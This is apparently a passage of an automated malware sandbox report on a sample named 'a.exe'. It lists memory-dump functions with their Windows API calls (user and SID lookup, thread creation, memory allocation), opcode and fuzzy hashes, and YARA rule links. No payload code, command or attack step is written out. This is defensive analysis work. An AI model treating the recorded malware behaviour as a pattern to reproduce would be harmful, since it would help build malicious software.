Instruction ID: 43daf7af6daf35ea159501e28c561d1e0e5f2d987ecad8a4cd74b6edb92f3dac
Opcode Fuzzy Hash: 62b370056186f8de9b4383856482780c913f2568f9075f3de13fb1525ecfbc9f
Instruction Fuzzy Hash: C531AAB4D00248DFCB14CFA9D584ADEFBF5AB49314F18906AE818B7310D334A946CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00EDEB70, Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00EDEC11

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a718034003f37f20e39b8bb0a738f49c5dec2f60e387022d46c81b4694a495af
Instruction ID: 3b4359e4f0a6df42391e2de8dba8dee4f0c2964971350b64a2bcf1ec6c56c659
Opcode Fuzzy Hash: a718034003f37f20e39b8bb0a738f49c5dec2f60e387022d46c81b4694a495af
Instruction Fuzzy Hash: 003167B4D002589FCF10DFA9D984ADEFBB4BB49314F20942AE818BB310D775A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D500, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403239535.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be996daa0cecf5038cb328ffd84dfc631f8eab198eb8110b3f5ae588a2c79af3
Instruction ID: 843edf0745fc3f960e03f7a1e0f7228357511bd20fdf2d010951b6eb24d199c1
Opcode Fuzzy Hash: be996daa0cecf5038cb328ffd84dfc631f8eab198eb8110b3f5ae588a2c79af3
Instruction Fuzzy Hash: 5C210072504240DFDF11DF14D8C0B2ABF66FB88328F2485A9E8090B246CB36D856CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D6D01C, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403326730.0000000000D6D000.00000040.00000001.sdmp, Offset: 00D6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2dac977195c9ab785c14066ae803eb977892cbdbb6ca699a55d57aa6d9c9a51
Instruction ID: e1620810e41711ba4a98d844de61ebeee1d7befc528b1dfbd84f63ef5db9ef1b
Opcode Fuzzy Hash: b2dac977195c9ab785c14066ae803eb977892cbdbb6ca699a55d57aa6d9c9a51
Instruction Fuzzy Hash: 38210475A04244DFDB11DF14E9C4B26BB6AFB84324F288969E8450B646C336D85BCBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D6D104, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403326730.0000000000D6D000.00000040.00000001.sdmp, Offset: 00D6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a60b214dc7283dbf2d10ef5e82a4960794297c444beaa11566c634074218b96
Instruction ID: 24f27236e3991bf494ddbaa3a935c2833f482e7844f1c5ed612767928fe7783b
Opcode Fuzzy Hash: 5a60b214dc7283dbf2d10ef5e82a4960794297c444beaa11566c634074218b96
Instruction Fuzzy Hash: 3521F571A04344DFDB04DF50E9C0B26BB66FB85314F24C9A9D8494B642C37AD856CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00D6D2BC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403326730.0000000000D6D000.00000040.00000001.sdmp, Offset: 00D6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16eb987fb397b93a33036e01c396c04ce8c09f93ee5b486f6786c7c5283caa1a
Instruction ID: b7b7b2c59a0ec4f7f21b57622e12eca8a2aa34893a1df24e64dfbc9bd88d7e45
Opcode Fuzzy Hash: 16eb987fb397b93a33036e01c396c04ce8c09f93ee5b486f6786c7c5283caa1a
Instruction Fuzzy Hash: 55212671A04240DFDB00DF50E9C0B26BB66FB88324F24C96DD8494B356C33AD856CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00D6D005, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403326730.0000000000D6D000.00000040.00000001.sdmp, Offset: 00D6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cfd62584fe774378231f4f2b65fbeea952478929b10f8a3c6069b609e6d84b2
Instruction ID: fda5a3f2c7eee106ab184d15f524ed6e2baaca03f1a33c28e124279ee577244c
Opcode Fuzzy Hash: 7cfd62584fe774378231f4f2b65fbeea952478929b10f8a3c6069b609e6d84b2
Instruction Fuzzy Hash: 332180755093C08FDB12DF20D994B16BF72EB86314F2981EAD8448B657C33AD81ACB72

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D4FB, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403239535.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55fae22f98c3025e62d185c248c323e6c2013881971a4b5e006466a194d51c1a
Instruction ID: b4398347cc0dd4c9b7e2f55879370c515256f96da13a3b1f531902222c53235b
Opcode Fuzzy Hash: 55fae22f98c3025e62d185c248c323e6c2013881971a4b5e006466a194d51c1a
Instruction Fuzzy Hash: DD11BE76404280CFDF12DF10D9C4B16BF72FB85324F28C6A9D8090B656C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D6D2B7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403326730.0000000000D6D000.00000040.00000001.sdmp, Offset: 00D6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction ID: ce25e14ff467789ab45fcd12832621630149dbc9be6404fbd02a651ba7156261
Opcode Fuzzy Hash: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction Fuzzy Hash: 68119075904680DFDB01DF10E5C4B15BF62FB84324F28C6A9D8494B756C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D6D0FF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403326730.0000000000D6D000.00000040.00000001.sdmp, Offset: 00D6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction ID: e53714ea12cc8cfb151a6dc643baf5f63dece3dc886058db85b0b86c3bea29e3
Opcode Fuzzy Hash: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction Fuzzy Hash: 9511DD75A04380CFDB05DF10D9C4B15BFA2FB85324F28C6A9DC494B656C37AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D691, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403239535.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550d11c28e09a36a684eae08b78f2665fa87a734ab8ecadeb0d10951d22ae2a9
Instruction ID: a2b29c69d750ec082d3b1cbfc975c7ca481acd8c388837096077026d747f9666
Opcode Fuzzy Hash: 550d11c28e09a36a684eae08b78f2665fa87a734ab8ecadeb0d10951d22ae2a9
Instruction Fuzzy Hash: EF01F7311083889BEB105B69DC84B66BBD8EF40364F18845EED094A283C3799844DAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D690, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.403239535.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2931812e1535ab7d2c267e79d84bea986f638b94d4b142891ec7fe80dcee1ec4
Instruction ID: 6ee14617df394fb273a9d95f8edd445eeea4751edf9378be3f14c7e32294839e
Opcode Fuzzy Hash: 2931812e1535ab7d2c267e79d84bea986f638b94d4b142891ec7fe80dcee1ec4
Instruction Fuzzy Hash: 65F062714042849FEB118B19DC84B62FFE8EF91774F18C55AED085F686D3799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00622050, Relevance: 11.2, Instructions: 11170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.401659039.0000000000622000.00000002.00020000.sdmp, Offset: 00620000, based on PE: true

Associated: 00000011.00000002.401623505.0000000000620000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.402209770.000000000076E000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.402247569.000000000077E000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.402298946.000000000079E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c1d030840eff14b2d09f54c6b3fabece4d26a32e65f9b0a2937c3053850b0c
Instruction ID: a041383739e7788908a705439224cb9483e33dc70cc53a13e1e90322a022f753
Opcode Fuzzy Hash: 51c1d030840eff14b2d09f54c6b3fabece4d26a32e65f9b0a2937c3053850b0c
Instruction Fuzzy Hash: 4634B5AA84E3D24FCB135B745DB5190BFB29E2B15474E09CBC4C1CE4A3E18C199ADB63

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0AD8, Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

&, xrefs: 00ED9D75

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: d060688a878d6f96c4b64d08ea2007d8baa5881d8523111847a7ab58fe5e9f20
Instruction ID: 876d1a148804fb1c76a153afd5bfc1b2170be128821ada4ba7666dc52e60743c
Opcode Fuzzy Hash: d060688a878d6f96c4b64d08ea2007d8baa5881d8523111847a7ab58fe5e9f20
Instruction Fuzzy Hash: FF512B71D016588BEB2CCF678D446CAFAF3AFC9344F14C1FA990CA6255DB700A858E40

Uniqueness

Uniqueness Score: -1.00%

Function 00628210, Relevance: .8, Instructions: 813COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.401659039.0000000000622000.00000002.00020000.sdmp, Offset: 00620000, based on PE: true

Associated: 00000011.00000002.401623505.0000000000620000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.402209770.000000000076E000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.402247569.000000000077E000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.402298946.000000000079E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f0c80690471801eda1ad1e80afef757545793fa84b5f19e1a7149b89cca9a8
Instruction ID: f3accba7c264d90a45d7dc3efea5ee249f1cc7eec25551f55f02b604526ea7fe
Opcode Fuzzy Hash: e9f0c80690471801eda1ad1e80afef757545793fa84b5f19e1a7149b89cca9a8
Instruction Fuzzy Hash: 85620FA645E3D05FD7138BB45C7AA907FB1AE1721471E89CBC8C0CF0A3E2195A5AD732

Uniqueness

Uniqueness Score: -1.00%

Function 04FDAF78, Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd81297607be1feb29f293755f4a951e98b3b50480354569855f88f678e3af0
Instruction ID: 573270341278031ba8e36715fd8f9a74971c9449a8b5f59e4a4c0661ca2de5bc
Opcode Fuzzy Hash: afd81297607be1feb29f293755f4a951e98b3b50480354569855f88f678e3af0
Instruction Fuzzy Hash: 025245B09087168FD728CF68F8881997BB1FF45318F558268D2715B298D3B966CECF84

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0478, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7a57af799b9011a04ba85424641de68b73c0b0656e0858d0182130ef7b3e18
Instruction ID: 05790be0c80f767bec97929c4106b1d5e53a01dcd7d9b9f999342b3441241d12
Opcode Fuzzy Hash: fa7a57af799b9011a04ba85424641de68b73c0b0656e0858d0182130ef7b3e18
Instruction Fuzzy Hash: 08514D709003088FDB45DFB9E85179E7BF6EB85344F148829D108AB3B8DBB159068FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EDDC68, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1ab4665e87cbfbd3f83f02ad651ed9c2fc5eaf67da9563ec72576c9490ded3
Instruction ID: dced1efe730117d032058e7ca5b5061d34f15d5b318950aaba66607f237ce7a3
Opcode Fuzzy Hash: 5a1ab4665e87cbfbd3f83f02ad651ed9c2fc5eaf67da9563ec72576c9490ded3
Instruction Fuzzy Hash: E841DEB0D042489FDF10CFA9D885B9DBBB2EB49314F24912AE419BB390D7749846CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00ED0ACA, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.404029628.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220c7636100218a2d5d105d852ee8970814f85ace86e1be4f584a8fa94dfe863
Instruction ID: c56c4d8adebfb573cf728dbe5b13e6d30c95c4adfd5409b52e972a1a699f6556
Opcode Fuzzy Hash: 220c7636100218a2d5d105d852ee8970814f85ace86e1be4f584a8fa94dfe863
Instruction Fuzzy Hash: 49511771D056588BEB6CCF2B8D456CAFAF3AFC9340F14C1FAD54C66254DB700A958E41

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9E9C, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.420112441.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638687bf93389a90e6562a0891c96cd4f662aab8f91d01fd5801fb4e8395f7bb
Instruction ID: 9e23a8ca6274be04b535e4c758c47e9ee3aadfecde8b3beb3301b31caecc23d8
Opcode Fuzzy Hash: 638687bf93389a90e6562a0891c96cd4f662aab8f91d01fd5801fb4e8395f7bb
Instruction Fuzzy Hash: F931AAB5D012089FDB10CFA9E984ADEFBF5AB49314F24902AE814B7314D335A946CF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: a.exe PID: 5704 Parent PID: 6552 a.exeCOMMON

Executed Functions

Function 00401D60, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00401D8A
GetProcessHeap.KERNEL32(00000008,?), ref: 00401D9F
HeapAlloc.KERNEL32(00000000), ref: 00401DA2
GetUserNameW.ADVAPI32(00000000,?), ref: 00401DB0
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401DD3
GetProcessHeap.KERNEL32(00000008,?), ref: 00401DDE
HeapAlloc.KERNEL32(00000000), ref: 00401DE1
GetProcessHeap.KERNEL32(00000008,?), ref: 00401DF1
HeapAlloc.KERNEL32(00000000), ref: 00401DF4
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401E1E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401E31
GetProcessHeap.KERNEL32(00000000,?), ref: 00401EC2
HeapFree.KERNEL32(00000000), ref: 00401ECB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ED0
HeapFree.KERNEL32(00000000), ref: 00401ED3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401EDA
HeapFree.KERNEL32(00000000), ref: 00401EDD
LocalFree.KERNEL32(00000000), ref: 00401EE2

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 3e41fd35ea663a3204612e46dedc59235926ee7b42d9cf344542bb424f369814
Instruction ID: c025d58a089c5d2b99e727e01e6ce72123c409626856462f22a0c98c071522a6
Opcode Fuzzy Hash: 3e41fd35ea663a3204612e46dedc59235926ee7b42d9cf344542bb424f369814
Instruction Fuzzy Hash: 3A516175E00219ABDB109FA5CC84FAFBB7CEF44354F05456AED05A3250DB749E09CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004126A1, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004126A0,?,?,?,?,?,00413752), ref: 004126C3
TerminateProcess.KERNEL32(00000000,?,004126A0,?,?,?,?,?,00413752), ref: 004126CA
ExitProcess.KERNEL32 ref: 004126DC

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ba33a8806cefcc238e45f50a77dd1fa47f9b7d890db6abeacd4129f77972b38c
Instruction ID: a6cacecfcc8a8329eb18f1a2914fc2b41caf5fcaeb9c717804df41f3bf8694fe
Opcode Fuzzy Hash: ba33a8806cefcc238e45f50a77dd1fa47f9b7d890db6abeacd4129f77972b38c
Instruction Fuzzy Hash: BDE0B63110111CAFCB216F55DE09AAE3B69EB40381F444429F945CA2B1CB79EDE3DA8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410A47, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00010A53,0041054C), ref: 00410A4C

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8356884603ab52f3768a9df445e37b34d8c5714ee94dc8e372c708e5601582bc
Instruction ID: 570aa78f1fe16ae2741b32fc42f3eb544a4b2352426d1d37b1f9c5c7ca24d145
Opcode Fuzzy Hash: 8356884603ab52f3768a9df445e37b34d8c5714ee94dc8e372c708e5601582bc
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD2C, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 0041AFB4

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: c2ce94e46c85bf0af1811e78e0ec9e91c69e2a8d160a852b5f27474253c3925f
Instruction ID: 2c52a30ffe44defdf5ae33b519030068a36b081d1bf9acd49cd76cba591c218a
Opcode Fuzzy Hash: c2ce94e46c85bf0af1811e78e0ec9e91c69e2a8d160a852b5f27474253c3925f
Instruction Fuzzy Hash: BFC1F6B0A04205AFDB11DF99D880BEEBBB0FF49314F00415AE851A7391C7799D92CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0D9, Relevance: 13.8, APIs: 9, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 0041DD92: CreateFileW.KERNELBASE(00000000,00000000,?,0041E182,?,?,00000000,?,0041E182,00000000,0000000C), ref: 0041DDAF

GetLastError.KERNEL32 ref: 0041E1ED
__dosmaperr.LIBCMT ref: 0041E1F4
GetFileType.KERNELBASE(00000000), ref: 0041E200
GetLastError.KERNEL32 ref: 0041E20A
__dosmaperr.LIBCMT ref: 0041E213
CloseHandle.KERNEL32(00000000), ref: 0041E233
CloseHandle.KERNEL32(?), ref: 0041E380
GetLastError.KERNEL32 ref: 0041E3B2
__dosmaperr.LIBCMT ref: 0041E3B9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 63c23301972a63ebae4e810a15b1b2a2dc61179f21aa12e13154cfc4553f8bfb
Instruction ID: 9ad68dd7a7b44797b30b43aed175c4e448fabcda40857c9c54a2ff7343e63ea3
Opcode Fuzzy Hash: 63c23301972a63ebae4e810a15b1b2a2dc61179f21aa12e13154cfc4553f8bfb
Instruction Fuzzy Hash: D7A15832A00104AFCF29AF69DC517EE3BA1AB06324F14015EEC11EB391CB798997C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEB0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59threadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00404C50: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 0040476D

CreateThread.KERNEL32 ref: 0040EEFF
CreateThread.KERNEL32 ref: 0040EF10
CreateThread.KERNEL32 ref: 0040EF21
CreateThread.KERNEL32 ref: 0040EF32
CreateThread.KERNEL32 ref: 0040EF43
Sleep.KERNEL32(00007530), ref: 0040EF5A

Strings

Vh`, xrefs: 0040EF29

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateThread$FileModuleNameSleep
String ID: Vh`
API String ID: 641726796-2369940253
Opcode ID: 65a8665f06a8ee31d7aa0b69ebfad11713aa4d365ca094f80376e38262dfc8c7
Instruction ID: 98cd19effe6c0244ace276e3717bbbbaf5841b6d5497c53e06677c11d4746dc0
Opcode Fuzzy Hash: 65a8665f06a8ee31d7aa0b69ebfad11713aa4d365ca094f80376e38262dfc8c7
Instruction Fuzzy Hash: AA01AFB1BD831436F5B432A25C07F1A29048B41F99F70097AB7083E0D29DE8751549AE

Uniqueness

Uniqueness Score: -1.00%

Function 004191A4, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00418939: GetConsoleCP.KERNEL32(?,@=@,00000000), ref: 00418981

WriteFile.KERNELBASE(?,00000000,0042F058,?,00000000,?,@=@,@=@,@=@,?,?,?,004129A5,?,0042F058,00000010), ref: 004192F5
GetLastError.KERNEL32(?,@=@,@=@,@=@,?,?,?,004129A5,?,0042F058,00000010,00403D40), ref: 004192FF
__dosmaperr.LIBCMT ref: 00419344

Strings

@=@, xrefs: 00419282, 00419311
@=@, xrefs: 004191BA, 00419227, 00419236, 00419276, 004192B2, 004192C2, 004192D2
@=@, xrefs: 004191B8, 004191B9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: @=@$@=@$@=@
API String ID: 251514795-1687047140
Opcode ID: 407d535f8230cc1e9fd3c759a10c1cc1adcb862575b859d1afbc3435f5b6bb4a
Instruction ID: c79cec922416678a57e2bf11a166b90feba150859a21c988cf5a79548821b0e8
Opcode Fuzzy Hash: 407d535f8230cc1e9fd3c759a10c1cc1adcb862575b859d1afbc3435f5b6bb4a
Instruction Fuzzy Hash: 0A51D471A0020ABFDB11DFA5C855BEEBBB9FF09314F14045BE810A7291D6789DC2C769

Uniqueness

Uniqueness Score: -1.00%

Function 00416C34, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,@=@,?,00416B62,@=@,0042F178,0000000C,00416C14,0042F058), ref: 00416C8A
GetLastError.KERNEL32(?,00416B62,@=@,0042F178,0000000C,00416C14,0042F058), ref: 00416C94
__dosmaperr.LIBCMT ref: 00416CBF

Strings

@=@, xrefs: 00416C39

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID: @=@
API String ID: 490808831-2481937916
Opcode ID: a155b300bbe21e2077d8b7e741393fe23c8b13417509ec89815cb6fe20ae0afc
Instruction ID: a2bf20124bfb562a1a964434e6efd9ddfbeeae047277381b6a3e6a3e108aeeae
Opcode Fuzzy Hash: a155b300bbe21e2077d8b7e741393fe23c8b13417509ec89815cb6fe20ae0afc
Instruction Fuzzy Hash: 8301E1326001105AD224627AAC4A7EE77498B8273CF2B025FEC59873C2FE6DC8C142DD

Uniqueness

Uniqueness Score: -1.00%

Function 00404C95, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00404C9E

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: f321115d204debc945c60740f763ba28b11644335286f6752ecf75130979f039
Instruction ID: ae2ba43fb9c2cb7fdcb88d662746577142f626b9acdf0a8f36491bc739b25b49
Opcode Fuzzy Hash: f321115d204debc945c60740f763ba28b11644335286f6752ecf75130979f039
Instruction Fuzzy Hash: 9B816971B102045BEB08EB38CE85BEE7A66EF85304F50462EF505A72C2D77DDAD08B59

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC2, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00404DC5

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: 44d269ae5ab15fa35da5817f34b3cc6850d14b727e8e90da40bb49aa8aa150ea
Instruction ID: 9c87d3a2b7b9bd06ef3012c3d6eb3519afd72d7797d099997983ea8ef3503114
Opcode Fuzzy Hash: 44d269ae5ab15fa35da5817f34b3cc6850d14b727e8e90da40bb49aa8aa150ea
Instruction Fuzzy Hash: 558148716102045BEB18EB38CD85BAF7A66EF86304F50463EF504A72C2D77DDAD08B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405137, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 276COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040513A

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: 564cad8117a332825b22a768b233d5eae8502f8199ca2464e199281cb805e3f6
Instruction ID: 36e3cbba4857406557606e24f993d400504ce11bb03105ed6bb7e7793e021d04
Opcode Fuzzy Hash: 564cad8117a332825b22a768b233d5eae8502f8199ca2464e199281cb805e3f6
Instruction Fuzzy Hash: 86813971A102045BEB18EB28CD85BEF7A65EF45304F50462EF404AB2D2D77DD9D08F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040525E, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00405261

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: cbdbe22915b52aae636e5b36c14d7c4d67aa17e888da6fc806cbdc379369a477
Instruction ID: 25bb93181bc966d736c1fe06cf900eee2205e5f1509460bf83adaa426c88e6a3
Opcode Fuzzy Hash: cbdbe22915b52aae636e5b36c14d7c4d67aa17e888da6fc806cbdc379369a477
Instruction Fuzzy Hash: EC814871A102045BEB18EB28CD85BAF7A66EF45304F50466EF804A72C2D77DDAD08F99

Uniqueness

Uniqueness Score: -1.00%

Function 00405385, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00405388

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID: VWh@B
API String ID: 3188754299-636108645
Opcode ID: ce08064dce094a24a34733164e2a54739f5ed19b8ef7204d56377d82b27231a9
Instruction ID: de45082190fe01a6a6070eff573c292843c382e0a3b19a3180da9e427209ad14
Opcode Fuzzy Hash: ce08064dce094a24a34733164e2a54739f5ed19b8ef7204d56377d82b27231a9
Instruction Fuzzy Hash: 118137716106045BEB08EB28CD85BEF7A66EF85304F50463EF805A72C2D77DDAD08B59

Uniqueness

Uniqueness Score: -1.00%

Function 004054AC, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 004054AF

Strings

VWh@B, xrefs: 00405AC9

Memory Dump Source

